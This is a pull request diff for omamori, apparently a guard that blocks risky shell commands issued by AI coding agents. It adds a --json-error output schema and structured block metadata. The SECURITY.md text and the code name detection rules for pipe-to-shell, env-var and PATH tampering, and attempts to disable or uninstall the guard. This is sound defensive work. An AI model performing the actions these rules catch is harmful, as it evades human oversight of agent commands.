### PR TITLE
feat: Decision struct + --json-error flag (PR1b of v0.10.3, #240)

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -112,6 +112,34 @@ This rule ensures that the boundary matrix and test corpus grow together and tha
 | DI-12 | Env var tampering detection is token-level, not string-level | Phase 1B `detect_env_var_tampering` uses `shell_words::split` after normalization, with `is_command_position()` to prevent false positives on quoted strings and arguments |
 | DI-13 | Phase 1A relaxation requires Phase 2 compensation (v0.10.3+) | For every verb pattern that may be relaxed in Phase 1A by the data-flag allowlist (`gh issue/pr create --body`, `git commit -m/-F`, etc.), an equivalent `omamori-*-block` builtin rule MUST exist in `default_rules()` so that real `omamori config disable` invocations remain caught by Phase 2 rule matching. Each rule uses the `subcommand` field (v0.10.3+) so `args[0]` must match exactly, preventing false positives like `omamori exec -- echo disable config`. Enforced by `scripts/check-invariants.sh` invariant `phase1a-relaxation-requires-phase2` and unit tests `default_rules_includes_omamori_self_protect_six_rules` + `omamori_self_protect_rules_skip_false_positive_data_args`. |
 
+### `hook-check --json-error` schema (v0.10.3+, PR1b)
+
+When `--json-error` is passed to `omamori hook-check`, blocked commands emit a single JSON object to **stderr** (in place of free-form text). Allow paths still emit the regular Claude Code hook response on stdout. AI agent integrations consume this for retry / approach-switch decisions.
+
+**Schema**:
+
+```json
+{
+  "blocked": true,
+  "layer": "meta-pattern" | "rule" | "layer2:structural" | "layer2:pipe-to-shell:<wrapper>" | "layer2:obfuscated-expansion",
+  "rule_id": "<rule_name or layer-specific identifier>",
+  "reason": "<human-readable message>",
+  "matched_pattern": "<protected pattern token>" | null,
+  "matched_position": { "start": <usize>, "end": <usize> } | null,
+  "hint": "run `omamori explain -- <command>` for details"
+}
+```
+
+**Field semantics**:
+
+- `blocked`: always `true` (allow path uses Claude Code hook response, not this schema)
+- `layer`: forensic layer identifier; matches the audit log `detection_layer` field
+- `rule_id`: for `BlockRule` it is the rule name (e.g. `omamori-config-modify-block`); for `BlockMeta` it is the reason string itself; for `BlockStructural` it is the constant string `"structural"`
+- `matched_pattern`: the protected pattern token (`"config disable"`, `"omamori uninstall"`, etc.) when known; `null` for structural blocks where no specific pattern matched
+- `matched_position`: byte range `[start, end)` of the match in the original command string when known; `null` when position tracking is not available for the layer
+
+**Stability**: `blocked`, `layer`, `rule_id`, `reason`, `hint` are stable contract fields. Additional fields may be added in minor releases (e.g., `relaxed_by` for `Allow` JSON when added in PR1d). AI agents should ignore unknown keys.
+
 `guard_ai_config_modification` call sites: 9 (as of v0.9.0).
 
 ## Integrity Monitoring (v0.5.0+)

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -114,7 +114,9 @@ This rule ensures that the boundary matrix and test corpus grow together and tha
 
 ### `hook-check --json-error` schema (v0.10.3+, PR1b)
 
-When `--json-error` is passed to `omamori hook-check`, blocked commands emit a single JSON object to **stderr** (in place of free-form text). Allow paths still emit the regular Claude Code hook response on stdout. AI agent integrations consume this for retry / approach-switch decisions.
+When `--json-error` is passed to `omamori hook-check`, **blocked shell commands** emit a single JSON object to **stderr** (in place of free-form text). Allow paths still emit the regular Claude Code hook response on stdout. AI agent integrations consume this for retry / approach-switch decisions.
+
+**Current scope**: the JSON contract applies to the **shell-command path** only (i.e. `tool_input.command` blocked by Phase 1A meta-patterns / Phase 1B token detection / Phase 2 rule match / Phase 2 structural unwrap). Other deny paths — malformed hook input, file-op deny on protected paths, unknown-tool fail-open — currently retain free-form stderr; extension to those paths is tracked as a follow-up issue. AI agents can still detect these blocks by exit code 2.
 
 **Schema**:
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -121,7 +121,7 @@ When `--json-error` is passed to `omamori hook-check`, blocked commands emit a s
 ```json
 {
   "blocked": true,
-  "layer": "meta-pattern" | "rule" | "layer2:structural" | "layer2:pipe-to-shell:<wrapper>" | "layer2:obfuscated-expansion",
+  "layer": "layer2:meta-pattern" | "layer2:rule" | "layer2:structural" | "layer2:pipe-to-shell:<wrapper>" | "layer2:obfuscated-expansion",
   "rule_id": "<rule_name or layer-specific identifier>",
   "reason": "<human-readable message>",
   "matched_pattern": "<protected pattern token>" | null,
@@ -133,10 +133,14 @@ When `--json-error` is passed to `omamori hook-check`, blocked commands emit a s
 **Field semantics**:
 
 - `blocked`: always `true` (allow path uses Claude Code hook response, not this schema)
-- `layer`: forensic layer identifier; matches the audit log `detection_layer` field
+- `layer`: forensic layer identifier prefixed with `layer2:` to match the audit log `detection_layer` field exactly. Stderr JSON `layer` and audit row `detection_layer` are interchangeable for correlation
 - `rule_id`: for `BlockRule` it is the rule name (e.g. `omamori-config-modify-block`); for `BlockMeta` it is the reason string itself; for `BlockStructural` it is the constant string `"structural"`
-- `matched_pattern`: the protected pattern token (`"config disable"`, `"omamori uninstall"`, etc.) when known; `null` for structural blocks where no specific pattern matched
+- `matched_pattern`: the protected pattern token (`"config disable"`, `"omamori uninstall"`, etc.) when known. `null` for structural blocks (no specific pattern matched) and Phase 1B token-level detections (env tampering / PATH override) where no single substring identifies the trigger
 - `matched_position`: byte range `[start, end)` of the match in the original command string when known; `null` when position tracking is not available for the layer
+
+**Trade-off — audit gap in `--json-error` mode**:
+
+When `--json-error` is active, the hook **skips audit log emission** for the blocked event. This trade-off keeps stderr a single parseable JSON object even in degraded audit environments (missing or unreadable audit secret, full disk, broken permissions) where `AuditLogger::from_config` would otherwise emit free-form warnings. AI agent integrations get a reliable contract; the cost is that `omamori audit show --action block` may miss events from `--json-error` invocations. Operators who need full audit coverage should not pass `--json-error`; the regular text-mode hook records the audit row even when it cannot print to stderr cleanly.
 
 **Stability**: `blocked`, `layer`, `rule_id`, `reason`, `hint` are stable contract fields. Additional fields may be added in minor releases (e.g., `relaxed_by` for `Allow` JSON when added in PR1d). AI agents should ignore unknown keys.
 

--- a/src/cli/explain.rs
+++ b/src/cli/explain.rs
@@ -200,12 +200,12 @@ fn evaluate_layer1(
 
 fn evaluate_layer2(command_str: &str) -> Layer2Result {
     match check_command_for_hook(command_str) {
-        HookCheckResult::Allow => Layer2Result {
+        HookCheckResult::Allow { .. } => Layer2Result {
             blocked: false,
             phase: "allow".to_string(),
             detail: "no meta-pattern or rule match".to_string(),
         },
-        HookCheckResult::BlockMeta(reason) => Layer2Result {
+        HookCheckResult::BlockMeta { reason, .. } => Layer2Result {
             blocked: true,
             phase: "meta-pattern".to_string(),
             detail: reason.to_string(),
@@ -214,6 +214,7 @@ fn evaluate_layer2(command_str: &str) -> Layer2Result {
             rule_name,
             message,
             unwrap_chain,
+            ..
         } => {
             let detail = if let Some(chain) = unwrap_chain {
                 format!("{message} ({chain})")
@@ -229,6 +230,7 @@ fn evaluate_layer2(command_str: &str) -> Layer2Result {
         HookCheckResult::BlockStructural {
             message,
             wrapper_kind: _,
+            ..
         } => Layer2Result {
             // `wrapper_kind` is forensic-side only (audit `detection_layer`),
             // not surfaced via `omamori explain`. v0.9.7 #181 C-1.

--- a/src/engine/hook.rs
+++ b/src/engine/hook.rs
@@ -276,16 +276,18 @@ fn check_pre_phase_2(command: &str) -> Result<Vec<CommandInvocation>, HookCheckR
     let normalized = unwrap::normalize_compound_operators(command);
     if let Ok(tokens) = shell_words::split(&normalized) {
         if let Some(reason) = detect_env_var_tampering(&tokens) {
+            // Phase 1B: token-level detection has no single substring "pattern" —
+            // matched_pattern is None per schema (Codex review PR1b R2 [P2]).
             return Err(HookCheckResult::BlockMeta {
                 reason,
-                matched_pattern: Some(reason),
+                matched_pattern: None,
                 matched_position: None,
             });
         }
         if let Some(reason) = detect_path_shim_bypass(&tokens) {
             return Err(HookCheckResult::BlockMeta {
                 reason,
-                matched_pattern: Some(reason),
+                matched_pattern: None,
                 matched_position: None,
             });
         }
@@ -527,7 +529,7 @@ fn run_hook_check_command(
             );
             if json_error {
                 emit_json_error(
-                    "meta-pattern",
+                    "layer2:meta-pattern",
                     reason,
                     reason,
                     matched_pattern,
@@ -565,7 +567,7 @@ fn run_hook_check_command(
             );
             if json_error {
                 emit_json_error(
-                    "rule",
+                    "layer2:rule",
                     &rule_name,
                     &message,
                     matched_pattern,
@@ -923,7 +925,9 @@ fn audit_log_hook_block(
     // produced by `format_unwrap_chain`, wrapped in a 1-element vec.
     event.unwrap_chain = unwrap_chain.map(|c| vec![c]);
 
-    if let Err(e) = logger.append(event) {
+    if let Err(e) = logger.append(event)
+        && !suppress_warnings
+    {
         eprintln!(
             "omamori warning: failed to record Layer 2 hook deny event for {command:?}: {e}. \
              The 'omamori audit show --action block' surface is incomplete for this event."

--- a/src/engine/hook.rs
+++ b/src/engine/hook.rs
@@ -519,14 +519,22 @@ fn run_hook_check_command(
             // an AI agent that crashes between the two writes. Append is
             // best-effort with respect to the decision (SEC-7) — failure
             // surfaces a stderr warning but the block stays.
-            audit_log_hook_block(
-                command,
-                provider,
-                None,
-                None,
-                "layer2:meta-pattern".to_string(),
-                json_error,
-            );
+            //
+            // PR1b R3 [P2]: in --json-error mode, skip audit entirely.
+            // AuditLogger::from_config can emit secret-loading warnings to
+            // stderr that we cannot fully suppress through suppress_warnings,
+            // so we trade the audit row for a clean single-JSON contract.
+            // Documented in SECURITY.md "hook-check --json-error" trade-off.
+            if !json_error {
+                audit_log_hook_block(
+                    command,
+                    provider,
+                    None,
+                    None,
+                    "layer2:meta-pattern".to_string(),
+                    false,
+                );
+            }
             if json_error {
                 emit_json_error(
                     "layer2:meta-pattern",
@@ -557,14 +565,16 @@ fn run_hook_check_command(
                 .as_deref()
                 .map(|c| format!(" ({c})"))
                 .unwrap_or_default();
-            audit_log_hook_block(
-                command,
-                provider,
-                Some(&rule_name),
-                unwrap_chain.clone(),
-                "layer2:rule".to_string(),
-                json_error,
-            );
+            if !json_error {
+                audit_log_hook_block(
+                    command,
+                    provider,
+                    Some(&rule_name),
+                    unwrap_chain.clone(),
+                    "layer2:rule".to_string(),
+                    false,
+                );
+            }
             if json_error {
                 emit_json_error(
                     "layer2:rule",
@@ -601,14 +611,16 @@ fn run_hook_check_command(
                 Some(w) => format!("layer2:pipe-to-shell:{w}"),
                 None => "layer2:structural".to_string(),
             };
-            audit_log_hook_block(
-                command,
-                provider,
-                None,
-                None,
-                detection_layer.clone(),
-                json_error,
-            );
+            if !json_error {
+                audit_log_hook_block(
+                    command,
+                    provider,
+                    None,
+                    None,
+                    detection_layer.clone(),
+                    false,
+                );
+            }
             if json_error {
                 emit_json_error(
                     &detection_layer,

--- a/src/engine/hook.rs
+++ b/src/engine/hook.rs
@@ -248,13 +248,16 @@ fn detect_path_shim_bypass(tokens: &[String]) -> Option<&'static str> {
 /// `load_config(None)` when Phase 1A/1B/structural short-circuits the
 /// verdict.
 fn check_pre_phase_2(command: &str) -> Result<Vec<CommandInvocation>, HookCheckResult> {
-    // Phase 1A: String-level meta-patterns (path/config/uninstall)
+    // Phase 1A: String-level meta-patterns (path/config/uninstall).
+    // matched_pattern carries the actual `pattern` token (e.g. "config disable"),
+    // not the human-readable `reason`. Reason has its own `reason` / `rule_id`
+    // fields in the JSON schema. Codex review (PR1b R1) [P2].
     for (pattern, reason) in installer::blocked_string_patterns() {
-        if command.contains(pattern) {
+        if let Some(start) = command.find(pattern) {
             return Err(HookCheckResult::BlockMeta {
                 reason,
-                matched_pattern: Some(reason),
-                matched_position: None,
+                matched_pattern: Some(pattern),
+                matched_position: Some(start..start + pattern.len()),
             });
         }
     }
@@ -520,6 +523,7 @@ fn run_hook_check_command(
                 None,
                 None,
                 "layer2:meta-pattern".to_string(),
+                json_error,
             );
             if json_error {
                 emit_json_error(
@@ -557,6 +561,7 @@ fn run_hook_check_command(
                 Some(&rule_name),
                 unwrap_chain.clone(),
                 "layer2:rule".to_string(),
+                json_error,
             );
             if json_error {
                 emit_json_error(
@@ -594,7 +599,14 @@ fn run_hook_check_command(
                 Some(w) => format!("layer2:pipe-to-shell:{w}"),
                 None => "layer2:structural".to_string(),
             };
-            audit_log_hook_block(command, provider, None, None, detection_layer.clone());
+            audit_log_hook_block(
+                command,
+                provider,
+                None,
+                None,
+                detection_layer.clone(),
+                json_error,
+            );
             if json_error {
                 emit_json_error(
                     &detection_layer,
@@ -861,6 +873,7 @@ fn audit_log_hook_block(
     rule_name: Option<&str>,
     unwrap_chain: Option<String>,
     detection_layer_value: String,
+    suppress_warnings: bool,
 ) {
     debug_assert!(
         is_valid_detection_layer(&detection_layer_value),
@@ -870,11 +883,16 @@ fn audit_log_hook_block(
     let load_result = match load_config(None) {
         Ok(r) => r,
         Err(e) => {
-            eprintln!(
-                "omamori warning: could not record Layer 2 hook deny event for {command:?} \
-                 — config load failed: {e}. The 'omamori audit show --action block' surface \
-                 is incomplete for this event."
-            );
+            // PR1b R1 [P2]: in --json-error mode, suppress free-form stderr
+            // warnings so consumers receive a single JSON object on stderr.
+            // Audit gaps are still recorded by absence of the chain entry.
+            if !suppress_warnings {
+                eprintln!(
+                    "omamori warning: could not record Layer 2 hook deny event for {command:?} \
+                     — config load failed: {e}. The 'omamori audit show --action block' surface \
+                     is incomplete for this event."
+                );
+            }
             return;
         }
     };
@@ -1416,33 +1434,38 @@ mod tests {
     }
 
     /// PR1b (DI-13 / #239 follow-up): BlockMeta must populate `matched_pattern`
-    /// with the protected pattern token so acceptance test assertions can
-    /// reference structured metadata instead of brittle stderr substrings.
+    /// with the protected pattern token (NOT the human-readable reason — those
+    /// have separate fields) so acceptance tests can assert on structured
+    /// metadata instead of brittle stderr substrings.
+    /// Codex review (PR1b R1) [P2] enforced this contract.
     #[test]
     #[serial_test::serial]
     fn block_meta_populates_matched_pattern_metadata() {
         let (old_xdg, old_home, dir) = isolate_config();
         let result = check_command_for_hook("omamori uninstall");
-        let (got_pattern, got_reason) = match result {
+        let (got_pattern, got_position) = match result {
             HookCheckResult::BlockMeta {
-                reason,
                 matched_pattern,
+                matched_position,
                 ..
-            } => (matched_pattern, reason),
+            } => (matched_pattern, matched_position),
             _ => {
                 restore_config(old_xdg, old_home, dir);
                 panic!("expected BlockMeta for `omamori uninstall`");
             }
         };
         restore_config(old_xdg, old_home, dir);
+        let pattern = got_pattern.expect("matched_pattern must be populated");
         assert!(
-            got_pattern.is_some(),
-            "BlockMeta must populate matched_pattern (got None)"
+            pattern.contains("uninstall"),
+            "matched_pattern should be the protected token (e.g. 'omamori uninstall'), got {:?}",
+            pattern
         );
-        assert_eq!(
-            got_pattern,
-            Some(got_reason),
-            "matched_pattern should equal reason for Phase 1A meta-pattern blocks"
+        let position = got_position.expect("matched_position must be populated");
+        assert!(
+            position.end > position.start,
+            "matched_position must have non-empty range, got {:?}",
+            position
         );
     }
 

--- a/src/engine/hook.rs
+++ b/src/engine/hook.rs
@@ -522,19 +522,9 @@ fn run_hook_check_command(
             //
             // PR1b R3 [P2]: in --json-error mode, skip audit entirely.
             // AuditLogger::from_config can emit secret-loading warnings to
-            // stderr that we cannot fully suppress through suppress_warnings,
-            // so we trade the audit row for a clean single-JSON contract.
+            // stderr that we cannot fully suppress at append time, so we
+            // trade the audit row for a clean single-JSON contract.
             // Documented in SECURITY.md "hook-check --json-error" trade-off.
-            if !json_error {
-                audit_log_hook_block(
-                    command,
-                    provider,
-                    None,
-                    None,
-                    "layer2:meta-pattern".to_string(),
-                    false,
-                );
-            }
             if json_error {
                 emit_json_error(
                     "layer2:meta-pattern",
@@ -545,12 +535,19 @@ fn run_hook_check_command(
                     command,
                 );
             } else {
+                audit_log_hook_block(
+                    command,
+                    provider,
+                    None,
+                    None,
+                    "layer2:meta-pattern".to_string(),
+                );
                 eprintln!("omamori hook: blocked — {reason}");
                 if verbose {
                     eprintln!("  provider: {provider}");
                     eprintln!("  layer: meta-pattern (string-level)");
                 }
-                eprintln!("  hint: run `omamori explain -- {}` for details", command);
+                eprintln!("  hint: run `omamori explain -- {command}` for details");
             }
             Ok(2)
         }
@@ -561,20 +558,6 @@ fn run_hook_check_command(
             matched_pattern,
             matched_position,
         } => {
-            let chain_str = unwrap_chain
-                .as_deref()
-                .map(|c| format!(" ({c})"))
-                .unwrap_or_default();
-            if !json_error {
-                audit_log_hook_block(
-                    command,
-                    provider,
-                    Some(&rule_name),
-                    unwrap_chain.clone(),
-                    "layer2:rule".to_string(),
-                    false,
-                );
-            }
             if json_error {
                 emit_json_error(
                     "layer2:rule",
@@ -585,6 +568,17 @@ fn run_hook_check_command(
                     command,
                 );
             } else {
+                audit_log_hook_block(
+                    command,
+                    provider,
+                    Some(&rule_name),
+                    unwrap_chain.clone(),
+                    "layer2:rule".to_string(),
+                );
+                let chain_str = unwrap_chain
+                    .as_deref()
+                    .map(|c| format!(" ({c})"))
+                    .unwrap_or_default();
                 eprintln!("omamori hook: blocked — {message}{chain_str}");
                 if verbose {
                     eprintln!("  provider: {provider}");
@@ -611,16 +605,6 @@ fn run_hook_check_command(
                 Some(w) => format!("layer2:pipe-to-shell:{w}"),
                 None => "layer2:structural".to_string(),
             };
-            if !json_error {
-                audit_log_hook_block(
-                    command,
-                    provider,
-                    None,
-                    None,
-                    detection_layer.clone(),
-                    false,
-                );
-            }
             if json_error {
                 emit_json_error(
                     &detection_layer,
@@ -631,6 +615,7 @@ fn run_hook_check_command(
                     command,
                 );
             } else {
+                audit_log_hook_block(command, provider, None, None, detection_layer);
                 eprintln!("{message}");
                 if verbose {
                     eprintln!("  provider: {provider}");
@@ -887,7 +872,6 @@ fn audit_log_hook_block(
     rule_name: Option<&str>,
     unwrap_chain: Option<String>,
     detection_layer_value: String,
-    suppress_warnings: bool,
 ) {
     debug_assert!(
         is_valid_detection_layer(&detection_layer_value),
@@ -897,16 +881,11 @@ fn audit_log_hook_block(
     let load_result = match load_config(None) {
         Ok(r) => r,
         Err(e) => {
-            // PR1b R1 [P2]: in --json-error mode, suppress free-form stderr
-            // warnings so consumers receive a single JSON object on stderr.
-            // Audit gaps are still recorded by absence of the chain entry.
-            if !suppress_warnings {
-                eprintln!(
-                    "omamori warning: could not record Layer 2 hook deny event for {command:?} \
-                     — config load failed: {e}. The 'omamori audit show --action block' surface \
-                     is incomplete for this event."
-                );
-            }
+            eprintln!(
+                "omamori warning: could not record Layer 2 hook deny event for {command:?} \
+                 — config load failed: {e}. The 'omamori audit show --action block' surface \
+                 is incomplete for this event."
+            );
             return;
         }
     };
@@ -937,9 +916,7 @@ fn audit_log_hook_block(
     // produced by `format_unwrap_chain`, wrapped in a 1-element vec.
     event.unwrap_chain = unwrap_chain.map(|c| vec![c]);
 
-    if let Err(e) = logger.append(event)
-        && !suppress_warnings
-    {
+    if let Err(e) = logger.append(event) {
         eprintln!(
             "omamori warning: failed to record Layer 2 hook deny event for {command:?}: {e}. \
              The 'omamori audit show --action block' surface is incomplete for this event."
@@ -1310,20 +1287,17 @@ fn emit_json_error(
     matched_position: Option<&Range<usize>>,
     command: &str,
 ) {
-    let position = matched_position.map(|r| {
-        serde_json::json!({
-            "start": r.start,
-            "end": r.end,
-        })
-    });
     let payload = serde_json::json!({
         "blocked": true,
         "layer": layer,
         "rule_id": rule_id,
         "reason": reason,
         "matched_pattern": matched_pattern,
-        "matched_position": position,
-        "hint": format!("run `omamori explain -- {}` for details", command),
+        "matched_position": matched_position.map(|r| serde_json::json!({
+            "start": r.start,
+            "end": r.end,
+        })),
+        "hint": format!("run `omamori explain -- {command}` for details"),
     });
     eprintln!(
         "{}",
@@ -1474,14 +1448,12 @@ mod tests {
         let pattern = got_pattern.expect("matched_pattern must be populated");
         assert!(
             pattern.contains("uninstall"),
-            "matched_pattern should be the protected token (e.g. 'omamori uninstall'), got {:?}",
-            pattern
+            "matched_pattern should be the protected token (e.g. 'omamori uninstall'), got {pattern:?}"
         );
         let position = got_position.expect("matched_position must be populated");
         assert!(
             position.end > position.start,
-            "matched_position must have non-empty range, got {:?}",
-            position
+            "matched_position must have non-empty range, got {position:?}"
         );
     }
 

--- a/src/engine/hook.rs
+++ b/src/engine/hook.rs
@@ -5,6 +5,7 @@
 //! See threat model T8 (DREAD 9.0): fail-close fallback in check_command_for_hook.
 
 use std::ffi::OsString;
+use std::ops::Range;
 
 use crate::AppError;
 use crate::config::{self, ConfigLoadResult, load_config};
@@ -24,16 +25,34 @@ use crate::unwrap;
 /// comparison. Not re-exported — downstream callers must invoke the AI-
 /// tool hook entry point (`omamori hook-check`) instead, so phase
 /// short-circuits and rule loading both run.
+#[allow(dead_code)] // PR1b: metadata fields populated in PR1c; values currently None
 pub(crate) enum HookCheckResult {
     /// Command is allowed.
-    Allow,
+    ///
+    /// `relaxed_by` identifies which heuristic permitted the command when the
+    /// allow path was reached via a relaxation (e.g. data-flag allowlist in
+    /// PR1d). `None` means the command was allowed by the default policy
+    /// (no protected pattern matched). Used by audit log to tag relaxed
+    /// decisions for forensic review (DI-13 / Gap 1).
+    Allow { relaxed_by: Option<&'static str> },
     /// Command is blocked by a meta-pattern (string-level).
-    BlockMeta(&'static str),
+    ///
+    /// `matched_pattern` carries the protected pattern token (`"config disable"`,
+    /// `"omamori uninstall"`, etc.) for acceptance test assertions and
+    /// structured error output. `matched_position` is the byte range of
+    /// the match in the original command string when known.
+    BlockMeta {
+        reason: &'static str,
+        matched_pattern: Option<&'static str>,
+        matched_position: Option<Range<usize>>,
+    },
     /// Command is blocked by the unwrap stack (token-level rule match).
     BlockRule {
         rule_name: String,
         message: String,
         unwrap_chain: Option<String>,
+        matched_pattern: Option<&'static str>,
+        matched_position: Option<Range<usize>>,
     },
     /// Command is blocked by the unwrap stack (structural block: pipe-to-shell, etc.).
     ///
@@ -49,6 +68,8 @@ pub(crate) enum HookCheckResult {
     BlockStructural {
         message: String,
         wrapper_kind: Option<&'static str>,
+        matched_pattern: Option<&'static str>,
+        matched_position: Option<Range<usize>>,
     },
 }
 
@@ -230,7 +251,11 @@ fn check_pre_phase_2(command: &str) -> Result<Vec<CommandInvocation>, HookCheckR
     // Phase 1A: String-level meta-patterns (path/config/uninstall)
     for (pattern, reason) in installer::blocked_string_patterns() {
         if command.contains(pattern) {
-            return Err(HookCheckResult::BlockMeta(reason));
+            return Err(HookCheckResult::BlockMeta {
+                reason,
+                matched_pattern: Some(reason),
+                matched_position: None,
+            });
         }
     }
 
@@ -248,10 +273,18 @@ fn check_pre_phase_2(command: &str) -> Result<Vec<CommandInvocation>, HookCheckR
     let normalized = unwrap::normalize_compound_operators(command);
     if let Ok(tokens) = shell_words::split(&normalized) {
         if let Some(reason) = detect_env_var_tampering(&tokens) {
-            return Err(HookCheckResult::BlockMeta(reason));
+            return Err(HookCheckResult::BlockMeta {
+                reason,
+                matched_pattern: Some(reason),
+                matched_position: None,
+            });
         }
         if let Some(reason) = detect_path_shim_bypass(&tokens) {
-            return Err(HookCheckResult::BlockMeta(reason));
+            return Err(HookCheckResult::BlockMeta {
+                reason,
+                matched_pattern: Some(reason),
+                matched_position: None,
+            });
         }
     }
 
@@ -275,6 +308,8 @@ fn check_pre_phase_2(command: &str) -> Result<Vec<CommandInvocation>, HookCheckR
             Err(HookCheckResult::BlockStructural {
                 message: format!("omamori hook: blocked — {}", reason.message()),
                 wrapper_kind,
+                matched_pattern: None,
+                matched_position: None,
             })
         }
         unwrap::ParseResult::Commands(invocations) => Ok(invocations),
@@ -299,10 +334,12 @@ fn match_invocations_against_rules(
                 rule_name: rule.name.clone(),
                 message: msg,
                 unwrap_chain: chain_desc,
+                matched_pattern: None,
+                matched_position: None,
             };
         }
     }
-    HookCheckResult::Allow
+    HookCheckResult::Allow { relaxed_by: None }
 }
 
 /// Three-phase hook check, evaluating against rules loaded from on-disk
@@ -387,6 +424,7 @@ pub(crate) fn run_hook_check(args: &[OsString]) -> Result<i32, AppError> {
 
     let provider = parse_provider_flag(args);
     let verbose = std::env::var("OMAMORI_VERBOSE").is_ok();
+    let json_error = parse_json_error_flag(args);
 
     let mut input = String::new();
     std::io::stdin().read_to_string(&mut input)?;
@@ -423,7 +461,7 @@ pub(crate) fn run_hook_check(args: &[OsString]) -> Result<i32, AppError> {
         HookInput::UnknownTool {
             tool_name,
             tool_input,
-        } => run_hook_check_unknown_tool(&tool_name, &tool_input, &provider, verbose),
+        } => run_hook_check_unknown_tool(&tool_name, &tool_input, &provider, verbose, json_error),
         HookInput::FileOp { tool, path } => {
             if let Some(reason) = is_protected_file_path(&path) {
                 eprintln!("omamori hook: blocked {tool} to protected file — {reason}");
@@ -449,19 +487,28 @@ pub(crate) fn run_hook_check(args: &[OsString]) -> Result<i32, AppError> {
                 print_hook_check_allow_response("omamori: empty command");
                 return Ok(0);
             }
-            run_hook_check_command(&command, &provider, verbose)
+            run_hook_check_command(&command, &provider, verbose, json_error)
         }
     }
 }
 
 /// Evaluate a shell command through the two-phase hook check pipeline.
-fn run_hook_check_command(command: &str, provider: &str, verbose: bool) -> Result<i32, AppError> {
+fn run_hook_check_command(
+    command: &str,
+    provider: &str,
+    verbose: bool,
+    json_error: bool,
+) -> Result<i32, AppError> {
     match check_command_for_hook(command) {
-        HookCheckResult::Allow => {
+        HookCheckResult::Allow { .. } => {
             print_hook_check_allow_response("omamori: no dangerous pattern detected");
             Ok(0)
         }
-        HookCheckResult::BlockMeta(reason) => {
+        HookCheckResult::BlockMeta {
+            reason,
+            matched_pattern,
+            matched_position,
+        } => {
             // Append BEFORE printing stderr so the audit chain reflects the
             // deny narrative even if the user's terminal is being scraped by
             // an AI agent that crashes between the two writes. Append is
@@ -474,18 +521,31 @@ fn run_hook_check_command(command: &str, provider: &str, verbose: bool) -> Resul
                 None,
                 "layer2:meta-pattern".to_string(),
             );
-            eprintln!("omamori hook: blocked — {reason}");
-            if verbose {
-                eprintln!("  provider: {provider}");
-                eprintln!("  layer: meta-pattern (string-level)");
+            if json_error {
+                emit_json_error(
+                    "meta-pattern",
+                    reason,
+                    reason,
+                    matched_pattern,
+                    matched_position.as_ref(),
+                    command,
+                );
+            } else {
+                eprintln!("omamori hook: blocked — {reason}");
+                if verbose {
+                    eprintln!("  provider: {provider}");
+                    eprintln!("  layer: meta-pattern (string-level)");
+                }
+                eprintln!("  hint: run `omamori explain -- {}` for details", command);
             }
-            eprintln!("  hint: run `omamori explain -- {}` for details", command);
             Ok(2)
         }
         HookCheckResult::BlockRule {
             rule_name,
             message,
             unwrap_chain,
+            matched_pattern,
+            matched_position,
         } => {
             let chain_str = unwrap_chain
                 .as_deref()
@@ -498,18 +558,31 @@ fn run_hook_check_command(command: &str, provider: &str, verbose: bool) -> Resul
                 unwrap_chain.clone(),
                 "layer2:rule".to_string(),
             );
-            eprintln!("omamori hook: blocked — {message}{chain_str}");
-            if verbose {
-                eprintln!("  provider: {provider}");
-                eprintln!("  rule: {rule_name}");
-                eprintln!("  layer: unwrap-stack (token-level)");
+            if json_error {
+                emit_json_error(
+                    "rule",
+                    &rule_name,
+                    &message,
+                    matched_pattern,
+                    matched_position.as_ref(),
+                    command,
+                );
+            } else {
+                eprintln!("omamori hook: blocked — {message}{chain_str}");
+                if verbose {
+                    eprintln!("  provider: {provider}");
+                    eprintln!("  rule: {rule_name}");
+                    eprintln!("  layer: unwrap-stack (token-level)");
+                }
+                eprintln!("  hint: run `omamori explain -- {command}` for details");
             }
-            eprintln!("  hint: run `omamori explain -- {command}` for details");
             Ok(2)
         }
         HookCheckResult::BlockStructural {
             message,
             wrapper_kind,
+            matched_pattern,
+            matched_position,
         } => {
             // `wrapper_kind` flows into the audit `detection_layer` field as
             // `"layer2:pipe-to-shell:{wrapper}"` for forensic attribution but
@@ -521,13 +594,24 @@ fn run_hook_check_command(command: &str, provider: &str, verbose: bool) -> Resul
                 Some(w) => format!("layer2:pipe-to-shell:{w}"),
                 None => "layer2:structural".to_string(),
             };
-            audit_log_hook_block(command, provider, None, None, detection_layer);
-            eprintln!("{message}");
-            if verbose {
-                eprintln!("  provider: {provider}");
-                eprintln!("  layer: unwrap-stack (structural)");
+            audit_log_hook_block(command, provider, None, None, detection_layer.clone());
+            if json_error {
+                emit_json_error(
+                    &detection_layer,
+                    "structural",
+                    &message,
+                    matched_pattern,
+                    matched_position.as_ref(),
+                    command,
+                );
+            } else {
+                eprintln!("{message}");
+                if verbose {
+                    eprintln!("  provider: {provider}");
+                    eprintln!("  layer: unwrap-stack (structural)");
+                }
+                eprintln!("  hint: run `omamori explain -- {command}` for details");
             }
-            eprintln!("  hint: run `omamori explain -- {command}` for details");
             Ok(2)
         }
     }
@@ -565,6 +649,7 @@ fn run_hook_check_unknown_tool(
     tool_input: &serde_json::Value,
     provider: &str,
     verbose: bool,
+    json_error: bool,
 ) -> Result<i32, AppError> {
     match classify_input_shape(tool_input) {
         // Shell-shape and file-op-shape *should* have been resolved at
@@ -576,7 +661,7 @@ fn run_hook_check_unknown_tool(
                 print_hook_check_allow_response("omamori: empty command");
                 return Ok(0);
             }
-            run_hook_check_command(cmd, provider, verbose)
+            run_hook_check_command(cmd, provider, verbose, json_error)
         }
         InputShape::FileOp(path) => {
             if let Some(reason) = is_protected_file_path(path) {
@@ -861,10 +946,10 @@ pub(crate) fn run_cursor_hook() -> Result<i32, AppError> {
     }
 
     match check_command_for_hook(&command) {
-        HookCheckResult::Allow => {
+        HookCheckResult::Allow { .. } => {
             print_cursor_response(true, "allow", None, None);
         }
-        HookCheckResult::BlockMeta(reason) => {
+        HookCheckResult::BlockMeta { reason, .. } => {
             eprintln!("omamori cursor-hook: BLOCKED ({reason})");
             print_cursor_response(
                 false,
@@ -895,6 +980,7 @@ pub(crate) fn run_cursor_hook() -> Result<i32, AppError> {
         HookCheckResult::BlockStructural {
             message,
             wrapper_kind: _,
+            ..
         } => {
             // `wrapper_kind` is forensic-side only and stays out of the
             // user-facing cursor response for the same v0.9.5 reason as the
@@ -1173,6 +1259,45 @@ fn parse_provider_flag(args: &[OsString]) -> String {
     "unknown".to_string()
 }
 
+/// `--json-error` flag (PR1b, v0.10.3+): when present, hook-check emits
